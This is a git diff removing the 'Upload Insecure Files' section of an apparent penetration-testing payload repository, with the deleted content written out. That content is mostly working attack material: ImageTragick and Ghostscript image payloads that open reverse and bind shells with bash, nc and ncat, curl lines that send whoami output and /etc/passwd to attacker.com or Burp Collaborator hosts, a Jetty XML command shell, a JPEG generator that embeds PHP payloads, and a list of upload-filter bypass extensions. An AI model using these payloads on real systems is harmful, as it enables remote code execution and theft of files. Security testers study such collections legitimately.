--- a/Upload Insecure Files/Extension PHP/phpinfo.phar +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Extension PHP/phpinfo.php b/Upload Insecure Files/Extension PHP/phpinfo.php deleted file mode 100644 index 147cebc..0000000 --- a/Upload Insecure Files/Extension PHP/phpinfo.php +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Extension PHP/phpinfo.php3 b/Upload Insecure Files/Extension PHP/phpinfo.php3 deleted file mode 100644 index 147cebc..0000000 --- a/Upload Insecure Files/Extension PHP/phpinfo.php3 +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Extension PHP/phpinfo.php4 b/Upload Insecure Files/Extension PHP/phpinfo.php4 deleted file mode 100644 index 147cebc..0000000 --- a/Upload Insecure Files/Extension PHP/phpinfo.php4 +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Extension PHP/phpinfo.php5 b/Upload Insecure Files/Extension PHP/phpinfo.php5 deleted file mode 100644 index 147cebc..0000000 --- a/Upload Insecure Files/Extension PHP/phpinfo.php5 +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Extension PHP/phpinfo.php7 b/Upload Insecure Files/Extension PHP/phpinfo.php7 deleted file mode 100644 index 147cebc..0000000 --- a/Upload Insecure Files/Extension PHP/phpinfo.php7 +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Extension PHP/phpinfo.php8 b/Upload Insecure Files/Extension PHP/phpinfo.php8 deleted file mode 100644 index 147cebc..0000000 --- a/Upload Insecure Files/Extension PHP/phpinfo.php8 +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Extension PHP/phpinfo.phpt b/Upload Insecure Files/Extension PHP/phpinfo.phpt deleted file mode 100644 index 147cebc..0000000 --- a/Upload Insecure Files/Extension PHP/phpinfo.phpt +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Extension PHP/phpinfo.pht b/Upload Insecure Files/Extension PHP/phpinfo.pht deleted file mode 100644 index 147cebc..0000000 --- a/Upload Insecure Files/Extension PHP/phpinfo.pht +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Extension PHP/phpinfo.phtml b/Upload Insecure Files/Extension PHP/phpinfo.phtml deleted file mode 100644 index 147cebc..0000000 --- a/Upload Insecure Files/Extension PHP/phpinfo.phtml +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Extension PHP/shell.gif^shell.php b/Upload Insecure Files/Extension PHP/shell.gif^shell.php deleted file mode 100644 index b1c546e..0000000 --- a/Upload Insecure Files/Extension PHP/shell.gif^shell.php +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Extension PHP/shell.jpeg.php b/Upload Insecure Files/Extension PHP/shell.jpeg.php deleted file mode 100644 index b1abb37..0000000 --- a/Upload Insecure Files/Extension PHP/shell.jpeg.php +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Extension PHP/shell.jpg.php b/Upload Insecure Files/Extension PHP/shell.jpg.php deleted file mode 100644 index b1abb37..0000000 --- a/Upload Insecure Files/Extension PHP/shell.jpg.php +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Extension PHP/shell.jpg^shell.php b/Upload Insecure Files/Extension PHP/shell.jpg^shell.php deleted file mode 100644 index b1c546e..0000000 --- a/Upload Insecure Files/Extension PHP/shell.jpg^shell.php +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Extension PHP/shell.pgif b/Upload Insecure Files/Extension PHP/shell.pgif deleted file mode 100644 index 10ce64b..0000000 Binary files a/Upload Insecure Files/Extension PHP/shell.pgif and /dev/null differ diff --git a/Upload Insecure Files/Extension PHP/shell.phar b/Upload Insecure Files/Extension PHP/shell.phar deleted file mode 100644 index b1abb37..0000000 --- a/Upload Insecure Files/Extension PHP/shell.phar +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Extension PHP/shell.php b/Upload Insecure Files/Extension PHP/shell.php deleted file mode 100644 index b1abb37..0000000 --- a/Upload Insecure Files/Extension PHP/shell.php +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Extension PHP/shell.php3 b/Upload Insecure Files/Extension PHP/shell.php3 deleted file mode 100644 index b1abb37..0000000 --- a/Upload Insecure Files/Extension PHP/shell.php3 +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Extension PHP/shell.php4 b/Upload Insecure Files/Extension PHP/shell.php4 deleted file mode 100644 index b1abb37..0000000 --- a/Upload Insecure Files/Extension PHP/shell.php4 +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Extension PHP/shell.php5 b/Upload Insecure Files/Extension PHP/shell.php5 deleted file mode 100644 index b1abb37..0000000 --- a/Upload Insecure Files/Extension PHP/shell.php5 +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Extension PHP/shell.php7 b/Upload Insecure Files/Extension PHP/shell.php7 deleted file mode 100644 index b1abb37..0000000 --- a/Upload Insecure Files/Extension PHP/shell.php7 +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Extension PHP/shell.phpt b/Upload Insecure Files/Extension PHP/shell.phpt deleted file mode 100644 index b1abb37..0000000 --- a/Upload Insecure Files/Extension PHP/shell.phpt +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Extension PHP/shell.pht b/Upload Insecure Files/Extension PHP/shell.pht deleted file mode 100644 index b1abb37..0000000 --- a/Upload Insecure Files/Extension PHP/shell.pht +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Extension PHP/shell.phtml b/Upload Insecure Files/Extension PHP/shell.phtml deleted file mode 100644 index b1abb37..0000000 --- a/Upload Insecure Files/Extension PHP/shell.phtml +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Extension PHP/shell.png.php b/Upload Insecure Files/Extension PHP/shell.png.php deleted file mode 100644 index b1abb37..0000000 --- a/Upload Insecure Files/Extension PHP/shell.png.php +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Extension PHP/shell.png^shell.php b/Upload Insecure Files/Extension PHP/shell.png^shell.php deleted file mode 100644 index b1c546e..0000000 --- a/Upload Insecure Files/Extension PHP/shell.png^shell.php +++ /dev/null @@ -1 +0,0 @@ - diff --git a/Upload Insecure Files/Images/file-upload-mindmap.png b/Upload Insecure Files/Images/file-upload-mindmap.png deleted file mode 100644 index 964d174..0000000 Binary files a/Upload Insecure Files/Images/file-upload-mindmap.png and /dev/null differ diff --git a/Upload Insecure Files/Jetty RCE/JettyShell.xml b/Upload Insecure Files/Jetty RCE/JettyShell.xml deleted file mode 100644 index 769376c..0000000 --- a/Upload Insecure Files/Jetty RCE/JettyShell.xml +++ /dev/null @@ -1,15 +0,0 @@ - - - - - - - - /bin/sh - -c - curl -F "r=`id`" http://yourServer:1337/ - - - - - \ No newline at end of file diff --git a/Upload Insecure Files/Picture Compression/GIF_exploit.gif b/Upload Insecure Files/Picture Compression/GIF_exploit.gif deleted file mode 100644 index 67f5d45..0000000 Binary files a/Upload Insecure Files/Picture Compression/GIF_exploit.gif and /dev/null differ diff --git a/Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg b/Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg deleted file mode 100644 index 6955c3a..0000000 Binary files a/Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg and /dev/null differ diff --git a/Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png b/Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png deleted file mode 100644 index b0b9ed0..0000000 Binary files a/Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png and /dev/null differ diff --git a/Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png b/Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png deleted file mode 100644 index 845c145..0000000 Binary files a/Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png and /dev/null differ diff --git a/Upload Insecure Files/Picture Compression/createBulletproofJPG.py b/Upload Insecure Files/Picture Compression/createBulletproofJPG.py deleted file mode 100644 index c3e2bbb..0000000 --- a/Upload Insecure Files/Picture Compression/createBulletproofJPG.py +++ /dev/null @@ -1,135 +0,0 @@ -#!/usr/bin/python - -""" - Bulletproof Jpegs Generator - Copyright (C) 2012 Damien "virtualabs" Cauquil - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License along - with this program; if not, write to the Free Software Foundation, Inc., - 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. - - ------------- - # How to use - b.php?c=ls - Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l -""" -from __future__ import print_function - -from future import standard_library -standard_library.install_aliases() -from builtins import range -import struct,sys,os -import gd -from io import StringIO -from random import randint,shuffle -from time import time - -# image width/height (square) -N = 32 - - -def insertPayload(_in, _out, payload,off): - """ - Payload insertion (quick JPEG parsing and patching) - """ - img = _in - # look for 'FF DA' (SOS) - sos = img.index("\xFF\xDA") - sos_size = struct.unpack('>H',img[sos+2:sos+4])[0] - sod = sos_size+2 - # look for 'FF D9' (EOI) - eoi = img[sod:].index("\xFF\xD9") - # enough size ? - if (eoi - sod - off)>=len(payload): - _out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:]) - return True - else: - return False - -if __name__=='__main__': - - print("[+] Virtualabs' Nasty bulletproof Jpeg generator") - print(" | website: http://virtualabs.fr") - print(" | contact: virtualabs -at- gmail -dot- com") - print("") - - payloads = ["","","",""] - - # make sure the exploit-jpg directory exists or create it - if os.path.exists('exploit-jpg') and not os.path.isdir('exploit-jpg'): - print("[!] Please remove the file named 'exploit-jpg' from the current directory") - elif not os.path.exists('exploit-jpg'): - os.mkdir('exploit-jpg') - - # start generation - print('[i] Generating ...') - for q in list(range(50,100))+[-1]: - # loop over every payload - for p in payloads: - # not done yet - done = False - start = time() - # loop while not done and timeout not reached - while not done and (time()-start)<10.0: - - # we create a NxN pixels image, true colors - img = gd.image((N,N),True) - # we create a palette - pal = [] - for i in range(N*N): - pal.append(img.colorAllocate((randint(0,256),randint(0,256),randint(0,256)))) - # we shuffle this palette - shuffle(pal) - # and fill the image with it - pidx = 0 - for x in range(N): - for y in range(N): - img.setPixel((x,y),pal[pidx]) - pidx+=1 - - # write down the image - out_jpg = StringIO('') - img.writeJpeg(out_jpg,q) - out_raw = out_jpg.getvalue() - - # now, we try to insert the payload various ways - for i in range(64): - test_jpg = StringIO('') - if insertPayload(out_raw,test_jpg,p,i): - try: - # write down the new jpeg file - f = open('exploit-jpg/exploit-%d.jpg'%q,'wb') - f.write(test_jpg.getvalue()) - f.close() - - # load it with GD - test = gd.image('exploit-jpg/exploit-%d.jpg'%q) - final_jpg = StringIO('') - test.writeJpeg(final_jpg,q) - final_raw = final_jpg.getvalue() - # does it contain our payload ? - if p in final_raw: - # Yay ! - print('[i] Jpeg quality %d ... DONE'%q) - done = True - break - except IOError as e: - pass - else: - break - if not done: - # payload not found, we remove the file - os.unlink('exploit-jpg/exploit-%d.jpg'%q) - else: - break - \ No newline at end of file diff --git a/Upload Insecure Files/Picture Compression/createCompressedPNG_110x110.php b/Upload Insecure Files/Picture Compression/createCompressedPNG_110x110.php deleted file mode 100644 index 95c4180..0000000 --- a/Upload Insecure Files/Picture Compression/createCompressedPNG_110x110.php +++ /dev/null @@ -1,22 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php b/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php deleted file mode 100644 index d505461..0000000 --- a/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php +++ /dev/null @@ -1,22 +0,0 @@ -"; -$_width=200; -$_height=200; -if(strlen($_payload)%3!=0){ - echo "payload%3==0 !"; exit(); -} -$im = imagecreate($_width, $_height); -$_hex=unpack('H*',$_payload); - -$colors_hex=str_split($_hex[1], 6); - -for($i=0; $i < count($colors_hex); $i++){ - $_color_chunks=str_split($colors_hex[$i], 2); - $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2])); - imagesetpixel($im,$i,1,$color); -} - -imagegif($im,$_file); -?> \ No newline at end of file diff --git a/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php b/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php deleted file mode 100644 index d5abcb7..0000000 --- a/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php +++ /dev/null @@ -1,28 +0,0 @@ - "; -$_pay_len=strlen($_payload); -if(strlen($_payload)%3!=0){ - echo "payload%3==0 !"; exit(); -} - - -$width=$_pay_len/3; -$height=20; -//$im = imageCreateFromPng("existing.png"); -$im = imagecreate($width, $height); - -$_hex=unpack('H*',$_payload); -$_chunks=str_split($_hex[1], 6); - -for($i=0; $i < count($_chunks); $i++){ - - $_color_chunks=str_split($_chunks[$i], 2); - $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2])); - - imagesetpixel($im,$i,1,$color); - -} - -imagepng($im,"example.png"); \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/README.md b/Upload Insecure Files/Picture Image Magik/README.md deleted file mode 100644 index 98e51af..0000000 --- a/Upload Insecure Files/Picture Image Magik/README.md +++ /dev/null @@ -1,38 +0,0 @@ -# Image Tragik 1 & 2 - - -## Exploit v1 - -Simple reverse shell - -```powershell -push graphic-context -encoding "UTF-8" -viewbox 0 0 1 1 -affine 1 0 0 1 0 0 -push graphic-context -image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' -pop graphic-context -pop graphic-context -``` - -## Exploit v2 - -Simple `id` payload - -```powershell -%!PS -userdict /setpagedevice undef -save -legal -{ null restore } stopped { pop } if -{ legal } stopped { pop } if -restore -mark /OutputFile (%pipe%id) currentdevice putdeviceprops -``` - -then use `convert shellexec.jpeg whatever.gif` - -## Thanks to - -* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2) \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg b/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg deleted file mode 100644 index 64cb757..0000000 --- a/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg +++ /dev/null @@ -1,5 +0,0 @@ - -xmlns="http://www.w3.org/2000/svg"> - - \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg b/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg deleted file mode 100644 index 7981193..0000000 --- a/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg +++ /dev/null @@ -1,5 +0,0 @@ - -xmlns="http://www.w3.org/2000/svg"> - - \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg b/Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg deleted file mode 100644 index 05a276d..0000000 --- a/Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg +++ /dev/null @@ -1,6 +0,0 @@ -%!PS -userdict /setpagedevice undef -legal -{ null restore } stopped { pop } if -legal -mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf b/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf deleted file mode 100644 index 24669b5..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf +++ /dev/null @@ -1,4 +0,0 @@ -%!PS -currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) ) -.putdeviceparams -quit \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg b/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg deleted file mode 100644 index 3166619..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg +++ /dev/null @@ -1,6 +0,0 @@ -%!PS -userdict /setpagedevice undef -legal -{ null restore } stopped { pop } if -legal -mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1') currentdevice putdeviceprops \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg deleted file mode 100644 index 81e83f4..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg +++ /dev/null @@ -1,5 +0,0 @@ -push graphic-context -viewbox 0 0 640 480 -image over 0,0 0,0 'pango:@/etc/passwd' -pop graphic-context - diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg deleted file mode 100644 index 5f5c97e..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg +++ /dev/null @@ -1,5 +0,0 @@ -push graphic-context -viewbox 0 0 640 480 -image over 0,0 0,0 'text:/etc/passwd' -pop graphic-context - diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg deleted file mode 100644 index 7533ffb..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg +++ /dev/null @@ -1,9 +0,0 @@ -push graphic-context -encoding "UTF-8" -viewbox 0 0 1 1 -affine 1 0 0 1 0 0 -push graphic-context -image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' -pop graphic-context -pop graphic-context - diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png deleted file mode 100644 index afd0d61..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png +++ /dev/null @@ -1,8 +0,0 @@ -push graphic-context -encoding "UTF-8" -viewbox 0 0 1 1 -affine 1 0 0 1 0 0 -push graphic-context -image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 127.0.0.1 4444 0/tmp/gjdpez 2>&1; rm /tmp/gjdpez ' -pop graphic-context -pop graphic-context diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif deleted file mode 100644 index b2dc7ad..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif +++ /dev/null @@ -1,4 +0,0 @@ -push graphic-context -viewbox 0 0 640 480 -image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 127.0.0.1:1337 > /dev/null`' -pop graphic-context diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg deleted file mode 100644 index b2fb65d..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg +++ /dev/null @@ -1,4 +0,0 @@ -push graphic-context -viewbox 0 0 640 480 -fill 'url(https://example.com/image.jpg"|nc -l -p 7777 -e"/bin/sh)' -pop graphic-context diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png deleted file mode 100644 index 633b15b..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png +++ /dev/null @@ -1,4 +0,0 @@ -push graphic-context -viewbox 0 0 640 480 -fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "127.0.0.1)' -pop graphic-context diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg deleted file mode 100644 index 0735ca9..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg +++ /dev/null @@ -1,4 +0,0 @@ -push graphic-context -viewbox 0 0 640 480 -fill 'url(http://localhost:PORT/)' -pop graphic-context diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg deleted file mode 100644 index bca419d..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg +++ /dev/null @@ -1,4 +0,0 @@ -push graphic-context -viewbox 0 0 640 480 -fill 'url(http://IP_ATTAQUANT/)' -pop graphic-context diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg deleted file mode 100644 index 2664ca6..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg +++ /dev/null @@ -1,4 +0,0 @@ -push graphic-context -viewbox 0 0 640 480 -fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)' -pop graphic-context diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg deleted file mode 100644 index 78c2298..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg +++ /dev/null @@ -1,4 +0,0 @@ -push graphic-context -viewbox 0 0 640 480 -fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)' -pop graphic-context diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml deleted file mode 100644 index 3d0b4c2..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml +++ /dev/null @@ -1,9 +0,0 @@ - - - - - \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml deleted file mode 100644 index b31dee1..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml +++ /dev/null @@ -1,5 +0,0 @@ - - - - diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg deleted file mode 100644 index 358edb6..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg +++ /dev/null @@ -1 +0,0 @@ -push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1 ")' pop graphic-context \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg deleted file mode 100644 index 0c01c23..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg +++ /dev/null @@ -1,6 +0,0 @@ -%!PS -userdict /setpagedevice undef -legal -{ null restore } stopped { pop } if -legal -mark /OutputFile (%pipe%id) currentdevice putdeviceprops \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg deleted file mode 100644 index e89b57d..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg +++ /dev/null @@ -1,8 +0,0 @@ -%!PS -userdict /setpagedevice undef -save -legal -{ null restore } stopped { pop } if -{ legal } stopped { pop } if -restore -mark /OutputFile (%pipe%id) currentdevice putdeviceprops \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg deleted file mode 100644 index 2aed538..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg +++ /dev/null @@ -1,8 +0,0 @@ -%!PS -userdict /setpagedevice undef -save -legal -{ null restore } stopped { pop } if -{ legal } stopped { pop } if -restore -mark /OutputFile (%pipe%ncat 127.0.0.1 4242 -e /bin/sh) currentdevice putdeviceprops diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg deleted file mode 100644 index c9fa358..0000000 --- a/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg +++ /dev/null @@ -1,6 +0,0 @@ -%!PS -userdict /setpagedevice undef -legal -{ null restore } stopped { pop } if -legal -mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1') currentdevice putdeviceprops \ No newline at end of file diff --git a/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_echo.jpg b/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_echo.jpg deleted file mode 100644 index 1734547..0000000 Binary files a/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_echo.jpg and /dev/null differ diff --git a/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_revshell.jpg b/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_revshell.jpg deleted file mode 100644 index eca7e9b..0000000 Binary files a/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_revshell.jpg and /dev/null differ diff --git a/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg b/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg deleted file mode 100644 index 580cf6f..0000000 Binary files a/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg and /dev/null differ diff --git a/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif b/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif deleted file mode 100644 index 398d27c..0000000 Binary files a/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif and /dev/null differ diff --git a/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg b/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg deleted file mode 100644 index 385af5a..0000000 Binary files a/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg and /dev/null differ diff --git a/Upload Insecure Files/Picture Metadata/PHP_exif_system.png b/Upload Insecure Files/Picture Metadata/PHP_exif_system.png deleted file mode 100644 index edad263..0000000 Binary files a/Upload Insecure Files/Picture Metadata/PHP_exif_system.png and /dev/null differ diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md deleted file mode 100644 index 4813fb0..0000000 --- a/Upload Insecure Files/README.md +++ /dev/null @@ -1,219 +0,0 @@ -# Upload Insecure Files - -> Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. - -## Summary - -* [Tools](#tools) -* [Exploits](#exploits) - * [Defaults extensions](#defaults-extensions) - * [Upload tricks](#upload-tricks) - * [Filename vulnerabilities](#filename-vulnerabilities) - * [Picture compression](#picture-compression-) - * [Configuration Files](#configuration-files) - * [CVE - Image Tragik](#cve---image-tragik) - * [CVE - FFMpeg](#cve---ffmpeg) - * [ZIP Archive](#zip-archive) - * [Jetty RCE](#jetty-rce) -* [References](#references) - - -## Tools -- [Fuxploider](https://github.com/almandin/fuxploider) -- [Burp > Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa) -- [ZAP > FileUpload AddOn](https://www.zaproxy.org/blog/2021-08-20-zap-fileupload-addon/) - - -## Exploits - -![file-upload-mindmap.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Upload%20Insecure%20Files/Images/file-upload-mindmap.png?raw=true) - -### Defaults extensions - -* PHP Server - ```powershell - .php - .php3 - .php4 - .php5 - .php7 - - # Less known PHP extensions - .pht - .phps - .phar - .phpt - .pgif - .phtml - .phtm - .inc - ``` -* ASP Server - 